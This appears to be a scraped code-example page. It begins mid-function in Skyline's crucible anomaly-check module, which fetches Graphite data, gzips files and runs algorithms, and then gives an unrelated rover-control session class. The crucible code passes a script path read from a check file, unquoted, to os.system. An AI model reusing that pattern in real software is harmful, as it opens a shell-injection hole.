            if settings.ENABLE_CRUCIBLE_DEBUG:
                logger.info('metric variable - run_crucible_tests - %s' % run_crucible_tests)

        try:
            metric_vars.added_by
        except:
            if settings.ENABLE_CRUCIBLE_DEBUG:
                logger.info('failed to read added_by variable from check file - setting to crucible')
            added_by = 'crucible'
        else:
            added_by = str(metric_vars.added_by)
            if settings.ENABLE_CRUCIBLE_DEBUG:
                logger.info('metric variable - added_by - %s' % added_by)

        try:
            metric_vars.run_script
        except:
            run_script = False
            if settings.ENABLE_CRUCIBLE_DEBUG:
                logger.info('metric variable - run_script - not present set to False')
        else:
            run_script = str(metric_vars.run_script)
            if settings.ENABLE_CRUCIBLE_DEBUG:
                logger.info('metric variable - run_script - %s' % run_script)

        # Only check if the metric does not have an EXPIRATION_TIME key set, crucible
        # uses the alert EXPIRATION_TIME for the relevant alert setting contexts
        # whether that be analyzer, mirage, boundary, etc and sets its own
        # cache_keys in redis.  This prevents large amounts of data being added
        # in terms of timeseries json and image files, crucible samples at the
        # same EXPIRATION_TIME as alerts.

        source_app = 'crucible'
        expiration_timeout = 1800
        remove_all_anomaly_files = False
        check_expired = False
        check_time = time()

        if added_by == 'analyzer' or added_by == 'mirage':
            if settings.ENABLE_CRUCIBLE_DEBUG:
                logger.info('Will check %s ALERTS' % added_by)
            if settings.ENABLE_ALERTS:
                if settings.ENABLE_CRUCIBLE_DEBUG:
                    logger.info('Checking %s ALERTS' % added_by)
                for alert in settings.ALERTS:
                    ALERT_MATCH_PATTERN = alert[0]
                    METRIC_PATTERN = metric
                    alert_match_pattern = re.compile(ALERT_MATCH_PATTERN)
                    pattern_match = alert_match_pattern.match(METRIC_PATTERN)
                    if pattern_match:
                        source_app = added_by
                        expiration_timeout = alert[2]
                        if settings.ENABLE_CRUCIBLE_DEBUG:
                            logger.info('matched - %s - %s - EXPIRATION_TIME is %s' % (source_app, metric, str(expiration_timeout)))
                        check_age = int(check_time) - int(metric_timestamp)
                        if int(check_age) > int(expiration_timeout):
                            check_expired = True
                            if settings.ENABLE_CRUCIBLE_DEBUG:
                                logger.info('the check is older than EXPIRATION_TIME for the metric - not checking - check_expired')

        if added_by == 'boundary':
            if settings.BOUNDARY_ENABLE_ALERTS:
                for alert in settings.BOUNDARY_METRICS:
                    ALERT_MATCH_PATTERN = alert[0]
                    METRIC_PATTERN = metric
                    alert_match_pattern = re.compile(ALERT_MATCH_PATTERN)
                    pattern_match = alert_match_pattern.match(METRIC_PATTERN)
                    if pattern_match:
                        source_app = 'boundary'
                        expiration_timeout = alert[2]
                        if settings.ENABLE_CRUCIBLE_DEBUG:
                            logger.info('matched - %s - %s - EXPIRATION_TIME is %s' % (source_app, metric, str(expiration_timeout)))
                        check_age = int(check_time) - int(metric_timestamp)
                        if int(check_age) > int(expiration_timeout):
                            check_expired = True
                            if settings.ENABLE_CRUCIBLE_DEBUG:
                                logger.info('the check is older than EXPIRATION_TIME for the metric - not checking - check_expired')

        cache_key = 'crucible.last_check.%s.%s' % (source_app, metric)
        if settings.ENABLE_CRUCIBLE_DEBUG:
            logger.info('cache_key - crucible.last_check.%s.%s' % (source_app, metric))

        # Only use the cache_key EXPIRATION_TIME if this is not a request to
        # run_crucible_tests on a timeseries
        if run_crucible_tests == 'False':
            if check_expired:
                logger.info('check_expired - not checking Redis key')
                last_check = True
            else:
                if settings.ENABLE_CRUCIBLE_DEBUG:
                    logger.info('Checking if cache_key exists')
                try:
                    last_check = self.redis_conn.get(cache_key)
                except Exception as e:
                    logger.error('error :: could not query cache_key for %s - %s - %s' % (source_app, metric, e))
                    logger.info('all anomaly files will be removed')
                    remove_all_anomaly_files = True
                    # ensure last_check is defined if the Redis query failed
                    last_check = False

            if not last_check:
                try:
                    self.redis_conn.setex(cache_key, expiration_timeout, packb(value))
                    logger.info('set cache_key for %s - %s with timeout of %s' % (source_app, metric, str(expiration_timeout)))
                except Exception as e:
                    logger.error('error :: could not query cache_key for %s - %s - %s' % (source_app, metric, e))
                    logger.info('all anomaly files will be removed')
                    remove_all_anomaly_files = True
            else:
                if check_expired:
                    logger.info('check_expired - all anomaly files will be removed')
                    remove_all_anomaly_files = True
                else:
                    logger.info('cache_key is set and not expired for %s - %s - all anomaly files will be removed' % (source_app, metric))
                    remove_all_anomaly_files = True

        # anomaly dir
        if not os.path.exists(str(anomaly_dir)):
            try:
                mkdir_p(skyline_app, str(anomaly_dir))
                if settings.ENABLE_CRUCIBLE_DEBUG:
                    logger.info('created anomaly dir - %s' % str(anomaly_dir))
            except:
                logger.error('error :: failed to create anomaly_dir - %s' % str(anomaly_dir))

        if not os.path.exists(str(anomaly_dir)):
            logger.error('error :: anomaly_dir does not exist')
            fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file))
            return
        else:
            if settings.ENABLE_CRUCIBLE_DEBUG:
                logger.info('anomaly dir exists - %s' % str(anomaly_dir))

        failed_check_file = anomaly_dir + '/' + metric_timestamp + '.failed.check.' + metric + '.txt'
        if settings.ENABLE_CRUCIBLE_DEBUG:
            logger.info('failed_check_file - %s' % str(failed_check_file))

        # Retrieve data from graphite if necessary
        anomaly_graph = anomaly_dir + '/' + metric + '.png'
        anomaly_json = anomaly_dir + '/' + metric + '.json'
        anomaly_json_gz = anomaly_json + '.gz'
        if settings.ENABLE_CRUCIBLE_DEBUG:
            logger.info('anomaly_graph - %s' % str(anomaly_graph))
            logger.info('anomaly_json - %s' % str(anomaly_json))
            logger.info('anomaly_json_gz - %s' % str(anomaly_json_gz))

        # Some things added to crucible may not be added by a skyline app per se
        # and if run_crucible_tests is string True then no anomaly files should
        # be removed.
        if run_crucible_tests == 'True':
            remove_all_anomaly_files = False

        # Remove check and anomaly files if the metric has a EXPIRATION_TIME
        # cache_key set
        if remove_all_anomaly_files:
            if os.path.isfile(anomaly_graph):
                try:
                    os.remove(anomaly_graph)
                    if settings.ENABLE_CRUCIBLE_DEBUG:
                        logger.info('anomaly_graph removed - %s' % str(anomaly_graph))
                except OSError:
                    pass
            if os.path.isfile(anomaly_json):
                try:
                    os.remove(anomaly_json)
                    if settings.ENABLE_CRUCIBLE_DEBUG:
                        logger.info('anomaly_json removed - %s' % str(anomaly_json))
                except OSError:
                    pass
            if os.path.isfile(anomaly_json_gz):
                try:
                    os.remove(anomaly_json_gz)
                    if settings.ENABLE_CRUCIBLE_DEBUG:
                        logger.info('anomaly_json_gz removed - %s' % str(anomaly_json_gz))
                except OSError:
                    pass

            anomaly_txt_file = anomaly_dir + '/' + metric + '.txt'
            if os.path.isfile(anomaly_txt_file):
                try:
                    os.remove(anomaly_txt_file)
                    if settings.ENABLE_CRUCIBLE_DEBUG:
                        logger.info('anomaly_txt_file removed - %s' % str(anomaly_txt_file))
                except OSError:
                    pass

            # TBD - this data would have to be added to the Panorama DB before
            #       it is removed
            if os.path.isfile(str(metric_check_file)):
                try:
                    os.remove(str(metric_check_file))
                    if settings.ENABLE_CRUCIBLE_DEBUG:
                        logger.info('metric_check_file removed - %s' % str(metric_check_file))
                except OSError:
                    pass

            if os.path.exists(str(anomaly_dir)):
                try:
                    os.rmdir(str(anomaly_dir))
                    if settings.ENABLE_CRUCIBLE_DEBUG:
                        logger.info('anomaly_dir removed - %s' % str(anomaly_dir))
                except OSError:
                    pass

            logger.info('check and anomaly files removed')
            return

        # Check if the image exists
        if graphite_metric == 'True':

            if settings.ENABLE_CRUCIBLE_DEBUG:
                logger.info('graphite_metric - %s' % (graphite_metric))

            # Graphite timeouts
            connect_timeout = int(settings.GRAPHITE_CONNECT_TIMEOUT)
            if settings.ENABLE_CRUCIBLE_DEBUG:
                logger.info('connect_timeout - %s' % str(connect_timeout))

            read_timeout = int(settings.GRAPHITE_READ_TIMEOUT)
            if settings.ENABLE_CRUCIBLE_DEBUG:
                logger.info('read_timeout - %s' % str(read_timeout))

            graphite_until = datetime.datetime.fromtimestamp(int(metric_timestamp)).strftime('%H:%M_%Y%m%d')
            graphite_from = datetime.datetime.fromtimestamp(int(from_timestamp)).strftime('%H:%M_%Y%m%d')

            # graphite URL
            if settings.GRAPHITE_PORT != '':
                url = settings.GRAPHITE_PROTOCOL + '://' + settings.GRAPHITE_HOST + ':' + settings.GRAPHITE_PORT + '/render/?from=' + graphite_from + '&until=' + graphite_until + '&target=' + metric + '&format=json'
            else:
                url = settings.GRAPHITE_PROTOCOL + '://' + settings.GRAPHITE_HOST + '/render/?from=' + graphite_from + '&until=' + graphite_until + '&target=' + metric + '&format=json'
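            # e.g. a hypothetical resulting URL:
            # http://graphite.example.com:8080/render/?from=00:00_20230101&until=06:00_20230101&target=server1.cpu.user&format=json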
            if settings.ENABLE_CRUCIBLE_DEBUG:
                logger.info('graphite url - %s' % (url))

            if not os.path.isfile(anomaly_graph):
                logger.info('retrieving png - surfacing %s graph from graphite from %s to %s' % (metric, graphite_from, graphite_until))

                image_url = url.replace('&format=json', '')
                graphite_image_file = anomaly_dir + '/' + metric + '.png'
                if 'width' not in image_url:
                    image_url += '&width=586'
                if 'height' not in image_url:
                    image_url += '&height=308'
                if settings.ENABLE_CRUCIBLE_DEBUG:
                    logger.info('graphite image url - %s' % (image_url))
                image_url_timeout = int(connect_timeout)

                image_data = None

                try:
                    image_data = urllib2.urlopen(image_url, timeout=image_url_timeout).read()
                    logger.info('url OK - %s' % (image_url))
                except urllib2.URLError:
                    image_data = None
                    logger.error('error :: url bad - %s' % (image_url))

                if image_data is not None:
                    # write the raw PNG bytes in binary mode
                    with open(graphite_image_file, 'wb') as f:
                        f.write(image_data)
                    logger.info('retrieved - %s' % (anomaly_graph))
                    # a 0o644 octal literal is valid in both Python 2.6+ and Python 3;
                    # int('0644') and the string '0o644' do not set the intended mode
                    mode_arg = 0o644
                    os.chmod(graphite_image_file, mode_arg)
                else:
                    logger.error('error :: failed to retrieve - %s' % (anomaly_graph))
            else:
                if settings.ENABLE_CRUCIBLE_DEBUG:
                    logger.info('anomaly_graph file exists - %s' % str(anomaly_graph))

            if not os.path.isfile(anomaly_graph):
                logger.error('error :: retrieve failed to surface %s graph from graphite' % (metric))
            else:
                logger.info('graph image exists - %s' % (anomaly_graph))

            # Check if the json exists
            if not os.path.isfile(anomaly_json_gz):
                if not os.path.isfile(anomaly_json):
                    logger.info('surfacing timeseries data for %s from graphite from %s to %s' % (metric, graphite_from, graphite_until))
                    if requests.__version__ >= '2.4.0':
                        use_timeout = (int(connect_timeout), int(read_timeout))
                    else:
                        use_timeout = int(connect_timeout)
                    if settings.ENABLE_CRUCIBLE_DEBUG:
                        logger.info('use_timeout - %s' % (str(use_timeout)))

                    try:
                        r = requests.get(url, timeout=use_timeout)
                        js = r.json()
                        datapoints = js[0]['datapoints']
                        if settings.ENABLE_CRUCIBLE_DEBUG:
                            logger.info('data retrieved OK')
                    except:
                        datapoints = [[None, int(metric_timestamp)]]
                        logger.error('error :: data retrieval failed')

                    converted = []
                    for datapoint in datapoints:
                        try:
                            new_datapoint = [float(datapoint[1]), float(datapoint[0])]
                            converted.append(new_datapoint)
                        except:
                            continue

                    with open(anomaly_json, 'w') as f:
                        f.write(json.dumps(converted))
                    if python_version == 2:
                        mode_arg = int('0644', 8)
                    if python_version == 3:
                        mode_arg = 0o644
                    os.chmod(anomaly_json, mode_arg)
                    if settings.ENABLE_CRUCIBLE_DEBUG:
                        logger.info('json file - %s' % anomaly_json)

                if not os.path.isfile(anomaly_json):
                    logger.error('error :: failed to surface %s json from graphite' % (metric))
                    # Move metric check file
                    try:
                        shutil.move(metric_check_file, failed_check_file)
                        logger.info('moved check file to - %s' % failed_check_file)
                    except OSError:
                        logger.error('error :: failed to move check file to - %s' % failed_check_file)
                        pass
                    return

        # Check timeseries json exists - raw or gz
        if not os.path.isfile(anomaly_json):
            if not os.path.isfile(anomaly_json_gz):
                logger.error('error :: no json data found for %s' % (metric))
                # Move metric check file
                try:
                    shutil.move(metric_check_file, failed_check_file)
                    logger.info('moved check file to - %s' % failed_check_file)
                except OSError:
                    logger.error('error :: failed to move check file to - %s' % failed_check_file)
                    pass
                return
            else:
                logger.info('timeseries json gzip exists - %s' % (anomaly_json_gz))
        else:
            logger.info('timeseries json exists - %s' % (anomaly_json))

        # If the timeseries json exists and run_crucible_tests is str(False),
        # gzip it and return here as there is nothing further to do
        if run_crucible_tests == 'False':
            if settings.ENABLE_CRUCIBLE_DEBUG:
                logger.info('run_crucible_tests - %s' % run_crucible_tests)
            # gzip the json timeseries data
            if os.path.isfile(anomaly_json):
                if settings.ENABLE_CRUCIBLE_DEBUG:
                    logger.info('gzipping - %s' % anomaly_json)
                try:
                    f_in = open(anomaly_json)
                    f_out = gzip.open(anomaly_json_gz, 'wb')
                    f_out.writelines(f_in)
                    f_out.close()
                    f_in.close()
                    os.remove(anomaly_json)
                    if python_version == 2:
                        mode_arg = int('0644', 8)
                    if python_version == 3:
                        mode_arg = 0o644
                    os.chmod(anomaly_json_gz, mode_arg)
                    if settings.ENABLE_CRUCIBLE_DEBUG:
                        logger.info('gzipped - %s' % anomaly_json_gz)
                    try:
                        os.remove(metric_check_file)
                        logger.info('removed check file - %s' % metric_check_file)
                    except OSError:
                        pass
                    return
                except:
                    logger.error('error :: Failed to gzip data file - %s' % traceback.format_exc())
                    try:
                        os.remove(metric_check_file)
                        logger.info('removed check file - %s' % metric_check_file)
                    except OSError:
                        pass
                    return

            if os.path.isfile(anomaly_json_gz):
                if settings.ENABLE_CRUCIBLE_DEBUG:
                    logger.info('gzip exists - %s' % anomaly_json_gz)
                try:
                    os.remove(metric_check_file)
                    logger.info('removed check file - %s' % metric_check_file)
                except OSError:
                    pass
                return
            nothing_to_do = 'true - for debug only'

        # self.check_if_parent_is_alive()
        # Run crucible algorithms
        logger.info('running crucible tests - %s' % (metric))

        timeseries_dir = metric.replace('.', '/')

        if os.path.isfile(anomaly_json_gz):
            if not os.path.isfile(anomaly_json):
                if settings.ENABLE_CRUCIBLE_DEBUG:
                    logger.info('ungzipping - %s' % anomaly_json_gz)
                raw_timeseries = None
                try:
                    # with gzip.open(anomaly_json_gz, 'rb') as fr:
                    fr = gzip.open(anomaly_json_gz, 'rb')
                    raw_timeseries = fr.read()
                    fr.close()
                except Exception as e:
                    logger.error('error :: could not ungzip %s - %s' % (anomaly_json_gz, e))
                    traceback.print_exc()
                if raw_timeseries is not None:
                    if settings.ENABLE_CRUCIBLE_DEBUG:
                        logger.info('ungzipped')
                        logger.info('writing to - %s' % anomaly_json)
                    with open(anomaly_json, 'w') as fw:
                        fw.write(raw_timeseries)
                    if settings.ENABLE_CRUCIBLE_DEBUG:
                        logger.info('anomaly_json done')
                    if python_version == 2:
                        mode_arg = int('0644', 8)
                    if python_version == 3:
                        mode_arg = 0o644
                    os.chmod(anomaly_json, mode_arg)
        else:
            if settings.ENABLE_CRUCIBLE_DEBUG:
                logger.info('No gzip - %s' % anomaly_json_gz)
            nothing_to_do = 'true - for debug only'

        if os.path.isfile(anomaly_json):
            if settings.ENABLE_CRUCIBLE_DEBUG:
                logger.info('anomaly_json exists - %s' % anomaly_json)

        if os.path.isfile(anomaly_json):
            if settings.ENABLE_CRUCIBLE_DEBUG:
                logger.info('loading timeseries from - %s' % anomaly_json)
            with open(anomaly_json, 'r') as f:
                timeseries = json.loads(f.read())
            if settings.ENABLE_CRUCIBLE_DEBUG:
                logger.info('loaded timeseries from - %s' % anomaly_json)
        else:
            try:
                logger.error('error :: file not found - %s' % anomaly_json)
                shutil.move(metric_check_file, failed_check_file)
                if python_version == 2:
                    mode_arg = int('0644', 8)
                if python_version == 3:
                    mode_arg = 0o644
                os.chmod(failed_check_file, mode_arg)
                logger.info('moved check file to - %s' % failed_check_file)
            except OSError:
                logger.error('error :: failed to move check file to - %s' % failed_check_file)
                pass
            return

        start_timestamp = int(timeseries[0][0])
        if settings.ENABLE_CRUCIBLE_DEBUG:
            logger.info('start_timestamp - %s' % str(start_timestamp))
        end_timestamp = int(timeseries[-1][0])
        if settings.ENABLE_CRUCIBLE_DEBUG:
            logger.info('end_timestamp - %s' % str(end_timestamp))

        full_duration = end_timestamp - start_timestamp
        if settings.ENABLE_CRUCIBLE_DEBUG:
            logger.info('full_duration - %s' % str(full_duration))

        self.check_if_parent_is_alive()

        run_algorithms_start_timestamp = int(time())
        if settings.ENABLE_CRUCIBLE_DEBUG:
            logger.info('run_algorithms_start_timestamp - %s' % str(run_algorithms_start_timestamp))

        if settings.ENABLE_CRUCIBLE_DEBUG:
            logger.info('run_algorithms - %s,%s,%s,%s,%s,%s' % (metric, str(end_timestamp), str(full_duration), anomaly_json, skyline_app, str(algorithms)))
        anomalous = False
        ensemble = []
        try:
            anomalous, ensemble = run_algorithms(timeseries, str(metric), end_timestamp, full_duration, str(anomaly_json), skyline_app, algorithms)
        except:
            logger.error('error :: run_algorithms failed - %s' % traceback.format_exc())

        run_algorithms_end_timestamp = int(time())
        run_algorithms_seconds = run_algorithms_end_timestamp - run_algorithms_start_timestamp

        if settings.ENABLE_CRUCIBLE_DEBUG:
            logger.info('anomalous, ensemble - %s, %s' % (anomalous, str(ensemble)))

        if anomalous:
            if settings.ENABLE_CRUCIBLE_DEBUG:
                logger.info('anomalous - %s' % (anomalous))
            nothing_to_do = 'true - for debug only'

        logger.info('run_algorithms took %s seconds' % str(run_algorithms_seconds))

        # Update anomaly file
        crucible_data = 'crucible_tests_run = "%s"\n' \
                        'crucible_triggered_algorithms = %s\n' \
                        'tested_by = "%s"\n' \
            % (str(run_timestamp), str(ensemble), str(this_host))
        crucible_anomaly_file = '%s/%s.txt' % (anomaly_dir, metric)
        with open(crucible_anomaly_file, 'a') as fh:
            fh.write(crucible_data)
        if python_version == 2:
            mode_arg = int('0644', 8)
        if python_version == 3:
            mode_arg = 0o644
        os.chmod(crucible_anomaly_file, mode_arg)
        logger.info('updated crucible anomaly file - %s/%s.txt' % (anomaly_dir, metric))

        # gzip the json timeseries data after analysis
        if os.path.isfile(anomaly_json):
            if not os.path.isfile(anomaly_json_gz):
                try:
                    f_in = open(anomaly_json)
                    f_out = gzip.open(anomaly_json_gz, 'wb')
                    f_out.writelines(f_in)
                    f_out.close()
                    f_in.close()
                    os.remove(anomaly_json)
                    if python_version == 2:
                        mode_arg = int('0644', 8)
                    if python_version == 3:
                        mode_arg = 0o644
                    os.chmod(anomaly_json_gz, mode_arg)
                    logger.info('gzipped - %s' % (anomaly_json_gz))
                except:
                    logger.error('error :: Failed to gzip data file - %s' % traceback.format_exc())
            else:
                os.remove(anomaly_json)

        if run_script:
            if os.path.isfile(run_script):
                logger.info('running - %s' % (run_script))
                os.system('%s %s' % (str(run_script), str(crucible_anomaly_file)))

        # Remove metric check file
        try:
            os.remove(metric_check_file)
            logger.info('complete - removed check file - %s' % (metric_check_file))
        except OSError:
            pass

    def run(self):
        """
        Called when the process initializes.
        """

        # Log management to prevent overwriting
        # Allow the bin/<skyline_app>.d to manage the log
        if os.path.isfile(skyline_app_logwait):
            try:
                os.remove(skyline_app_logwait)
            except OSError:
                logger.error('error - failed to remove %s, continuing' % skyline_app_logwait)
                pass

        now = time()
        log_wait_for = now + 5
        while now < log_wait_for:
            if os.path.isfile(skyline_app_loglock):
                sleep(.1)
                now = time()
            else:
                now = log_wait_for + 1

        logger.info('starting %s run' % skyline_app)
        if os.path.isfile(skyline_app_loglock):
            logger.error('error - bin/%s.d log management seems to have failed, continuing' % skyline_app)
            try:
                os.remove(skyline_app_loglock)
                logger.info('log lock file removed')
            except OSError:
                logger.error('error - failed to remove %s, continuing' % skyline_app_loglock)
                pass
        else:
            logger.info('bin/%s.d log management done' % skyline_app)

        logger.info('process initialized')

        while 1:
            now = time()
            if settings.ENABLE_CRUCIBLE_DEBUG:
                logger.info('process started - %s' % int(now))

            # Make sure check_dir exists and has not been removed
            if settings.ENABLE_CRUCIBLE_DEBUG:
                logger.info('checking check dir exists - %s' % settings.CRUCIBLE_CHECK_PATH)
            if not os.path.exists(settings.CRUCIBLE_CHECK_PATH):
                logger.error('error :: check dir did not exist - %s' % settings.CRUCIBLE_CHECK_PATH)
                if python_version == 2:
                    mode_arg = int('0755', 8)
                if python_version == 3:
                    mode_arg = 0o755
                os.makedirs(settings.CRUCIBLE_CHECK_PATH, mode_arg)
                logger.info('check dir created - %s' % settings.CRUCIBLE_CHECK_PATH)
                # continue

            # Make sure Redis is up
            try:
                self.redis_conn.ping()
                logger.info('connected to redis at socket path %s' % settings.REDIS_SOCKET_PATH)
            except:
                logger.info('skyline can not connect to redis at socket path %s' % settings.REDIS_SOCKET_PATH)
                sleep(10)
                logger.info('connecting to redis at socket path %s' % settings.REDIS_SOCKET_PATH)
                self.redis_conn = StrictRedis(unix_socket_path=settings.REDIS_SOCKET_PATH)
                continue

            """
            Determine if any metric has been added to test
            """
            while True:

                # Report app up
                self.redis_conn.setex(skyline_app, 120, now)

                metric_var_files = [f for f in listdir(settings.CRUCIBLE_CHECK_PATH) if isfile(join(settings.CRUCIBLE_CHECK_PATH, f))]
#                if len(metric_var_files) == 0:
                if not metric_var_files:
                    logger.info('sleeping 10 no metric check files')
                    sleep(10)

                # Discover metric to analyze
                metric_var_files = ''
                metric_var_files = [f for f in listdir(settings.CRUCIBLE_CHECK_PATH) if isfile(join(settings.CRUCIBLE_CHECK_PATH, f))]
#                if len(metric_var_files) > 0:
                if metric_var_files:
                    break

            metric_var_files_sorted = sorted(metric_var_files)
            metric_check_file = settings.CRUCIBLE_CHECK_PATH + "/" + str(metric_var_files_sorted[0])

            logger.info('assigning check for processing - %s' % str(metric_var_files_sorted[0]))

            # Reset process_list
            self.process_list[:] = []

            # Spawn processes
            pids = []
            spawned_pids = []
            pid_count = 0
            run_timestamp = int(now)
            for i in range(1, settings.CRUCIBLE_PROCESSES + 1):
                p = Process(target=self.spin_process, args=(i, run_timestamp, str(metric_check_file)))
                pids.append(p)
                pid_count += 1
                logger.info('starting %s of %s spin_process/es' % (str(pid_count), str(settings.CRUCIBLE_PROCESSES)))
                p.start()
                spawned_pids.append(p.pid)

            # Send wait signal to zombie processes
            # for p in pids:
            #     p.join()
            # Self monitor processes and terminate if any spin_process has run
            # for longer than CRUCIBLE_TESTS_TIMEOUT
            p_starts = time()
            while time() - p_starts <= settings.CRUCIBLE_TESTS_TIMEOUT:
                if any(p.is_alive() for p in pids):
                    # Just to avoid hogging the CPU
                    sleep(.1)
                else:
                    # All the processes are done, break now.
                    time_to_run = time() - p_starts
                    logger.info('%s :: %s spin_process/es completed in %.2f seconds' % (skyline_app, str(settings.CRUCIBLE_PROCESSES), time_to_run))
                    break
            else:
                # We only enter this if we didn't 'break' above.
                logger.info('%s :: timed out, killing all spin_process processes' % (skyline_app))
                for p in pids:
                    p.terminate()
                    p.join()

            while os.path.isfile(metric_check_file):
                sleep(1)
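
A minimal standalone sketch (not part of the example above) of the datapoint conversion crucible performs when it surfaces data from Graphite: the render API returns [value, timestamp] pairs, while crucible wants [timestamp, value] pairs with nulls dropped, written to a json file and then gzipped. The file names and sample datapoints here are hypothetical.

import gzip
import json

# Hypothetical Graphite-style datapoints: [value, timestamp], including a null value
datapoints = [[None, 1470000000], [0.5, 1470000060], [0.7, 1470000120]]

# Swap to [timestamp, value] and skip any datapoint whose value is null
converted = []
for datapoint in datapoints:
    try:
        converted.append([float(datapoint[1]), float(datapoint[0])])
    except (TypeError, ValueError):
        continue

# Write the json, then gzip it, as the example does after analysis
with open('anomaly.json', 'w') as f:
    f.write(json.dumps(converted))

with open('anomaly.json', 'rb') as f_in:
    with gzip.open('anomaly.json.gz', 'wb') as f_out:
        f_out.writelines(f_in)
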
Example No. 41
0
class ClientSession():
    """ Manager object that manages the other subprocesses (comms, commands)
    and interfaces the GUI. This is NOT a process !"""

    def __init__(self,cfg,**kwargs):

        ##### Fetch basic args ######
       
        self.cfg = cfg


        ### log queue is provided by the caller
        self.queue_log = kwargs['queue_log']
        self.queue_console = kwargs['queue_console']
        
        ################################
        ### Session logic objects
        ################################

        self.dict_dispatch_rx = {}

        self.rover_status = {'headlights':False, \
                             'speed':0,\
                             'battery':100.0,\
                             'list_audio_files':[]}

        ################################
        ### Rover control objects
        ################################

        self.dict_rover_drive = {'stop':'DG5',\
                                 'north':'DG8',\
                                 'north_east':'DG9',\
                                 'east':'DG6', \
                                 'south_east':'DG3', \
                                 'south':'DG2', \
                                 'south_west':'DG1', \
                                 'west':'DG4', \
                                 'north_west':'DG7'}
        
        
    def init_multiprocessing(self):

        ######### Multiprocessing #########

        self.events = {}
        self.pipes = {}
        self.locks = {}
        self.queues = {}
        self.managers = {}
        
        
        ######## Events/Sync #########

        self.pipes['comms'] = Pipe()

        self.queues['cmd'] = JoinableQueue()
        self.queues['rx'] = JoinableQueue()
        self.queues['tx'] = JoinableQueue()
        self.queues['log'] = self.queue_log
        self.managers['videoframes'] = Manager().list()

        self.events['comms_enable'] = Event()
        self.events['comms_server_disconnect'] = Event()

        self.drive_lifo = Manager().list()


        ##############################
        ### Processes 
        ##############################

        #### Video : ####
        #self.videoproc = VideoProcess()


        #### Comms : ####
        self.commprocess = CommProcess(events={'enable':self.events['comms_enable'], 'server_disconnect':self.events['comms_server_disconnect']}, \
                                       queues={'log':self.queues['log'],'tx':self.queues['tx'], 'rx':self.queues['rx']},\
                                       pipes={'session':self.pipes['comms'][1]}, \
                                       tx_lifo=self.drive_lifo,
                                       rover_address=self.cfg.network.address,\
                                       rover_port_command=self.cfg.network.port_command)


    #################################
    ## Logging / support
    #################################

    def queue_to_log(self, msg):
        self.queues['log'].put(msg)

    def queue_to_console(self, msg):
        self.queue_console.put(msg)
        
    def queue_to_log_and_console(self, msg):
        self.queue_to_log(msg)
        self.queue_to_console(msg)
        
    #################################
    ## COMMS METHODS
    #################################
        
       
    def comms_launch_process(self):
        try:
            self.commprocess.start()
        except Exception as e:
            msg= 'error:could not launch Comms process : %s\n'%e
            self.queue_to_log(msg)
            self.events['comms_server_disconnect'].set()
            return False, msg
        
        msg = 'Comms process successfully launched.\n'
        return True, msg
    
    def comms_flush_rxtx_queues(self):
        while self.queues['rx'].empty()==False:
            self.queues['rx'].get()
        while self.queues['tx'].empty()==False:
            self.queues['tx'].get()
    
    def comms_enable(self):
        msg = 'Attempting connection to rover (%s,%s) ...\n'%(self.cfg.network.address,self.cfg.network.port_command)
        self.events['comms_enable'].set()

        ### Wait for status update from commprocess :
        result, msg = self.pipes['comms'][0].recv()

        if result == True:
            msg = 'Successfully connected to rover.\n'
            retbool = True
        else:
            msg = 'Error:could not connect to rover: %s\n'%msg.strip()
            self.events['comms_enable'].clear()
            retbool = False

        return retbool, msg         
                
    def comms_close(self):
        self.events['comms_enable'].clear()
        if self.commprocess.is_alive():
            self.commprocess.join()

        self.comms_flush_rxtx_queues()
        
        msg = 'Connection to rover closed.\n'
        self.queues['log'].put(msg)
        self.queue_console.put(msg)
        

    def comms_push_command(self, cmdstring):
        ### clean the command first
        cmd=cmdstring.strip()
        self.queues['tx'].put(cmd)

    def comms_push_drive_lifo(self, cmdstring):
        self.drive_lifo.append(cmdstring)

        
    def comms_fetch_rx(self):
        reslist = []
        count = 0
        while (count < FETCH_RX_BURST_SIZE) and (self.queues['rx'].empty()==False):
            reslist.append(self.queues['rx'].get())
            self.queues['rx'].task_done()
            count += 1
        return reslist

    ####################################################
    ## Session logic
    ####################################################
    
    def msgtreat_status(self, message):
        ## it's a status message:
        msg_body = message[1:]
        malformed = None
        if len(msg_body) > 0:

            ## battery ?
            if msg_body[0] == 'B':
                battery_str = msg_body[1:]
                if battery_str:
                    self.rover_status['battery'] = float(battery_str)
                else:
                    ## malformed battery status command :
                    malformed = "warning:malformed battery status message:\"%s\"\n" % message

            ## speed ?
            if msg_body[0] == 'S':
                speed_setting_str = msg_body[1:]
                if speed_setting_str:
                    self.rover_status['speed'] = int(speed_setting_str)
                else:
                    malformed = "warning:malformed speed setting status message:\"%s\"\n" % message

            ## headlights ?
            if msg_body[0] == 'H':
                headlight_str = msg_body[1:]
                if headlight_str:
                    self.rover_status['headlights'] = (headlight_str == '1')
                else:
                    malformed = "warning:malformed headlights status message:\"%s\"\n" % message

        if malformed is not None:
            self.queue_to_log_and_console(malformed)
            

    def msgtreat_default(self, message):
        ## by default, send it to the console queue
        self.queue_console.put(message)
    
    def analyze_received_messages(self,list_messages):
        ret=True
        for message in list_messages:
            if len(message)>0:
                msg0 = message[0]
                if msg0 in self.dict_dispatch_rx:
                    self.dict_dispatch_rx[msg0](message)
                else:
                    self.msgtreat_default(message)
            else:
                self.queue_to_log_and_console("warning: empty message received from rover:\"%s\"\n")
                ret=False

        return ret
            


    ####################################################
    ## Rover controls 
    ####################################################

    ##### Status / Accessory
    
    def rover_request_status_update(self):
        self.comms_push_command('SU')
        
    def rover_headlights_on(self):
        self.comms_push_command('H1')

    def rover_headlights_off(self):
        self.comms_push_command('H0')

    ##### Drive

    def rover_drive(self,where='stop'):
        #print "push command ",where
        self.comms_push_command(self.dict_rover_drive[where])
        #self.comms_push_drive_lifo(self.dict_rover_drive[where])
        
    def rover_flush_drive_lifo(self,keep=1):
        # assign in place so the shared Manager list proxy is preserved
        if keep==0:
            self.drive_lifo[:] = []
        else:
            self.drive_lifo[:] = self.drive_lifo[:-keep]
    
    ####################################################
    ## GUI Controls
    ####################################################

    def fetch_rx(self):
        reslist = []
        count = 0
        while (count < FETCH_RX_BURST_SIZE) and (self.queues['rx'].empty()==False):
            reslist.append(self.queues['rx'].get())
            self.queues['rx'].task_done()
            count += 1
        return reslist

    def fetch_console_messages(self):
        res=[]
        while self.queue_console.empty()==False:
            print('something in console')
            res.append(self.queue_console.get())
            self.queue_console.task_done()
        return res

    def fetch_status_updates(self):
        pass

    def is_rover_connected(self):
        if self.events['comms_enable'].is_set():
            return not self.events['comms_server_disconnect'].is_set()
        else:
            return False
        
    
    def close(self):
        self.events['comms_enable'].clear()
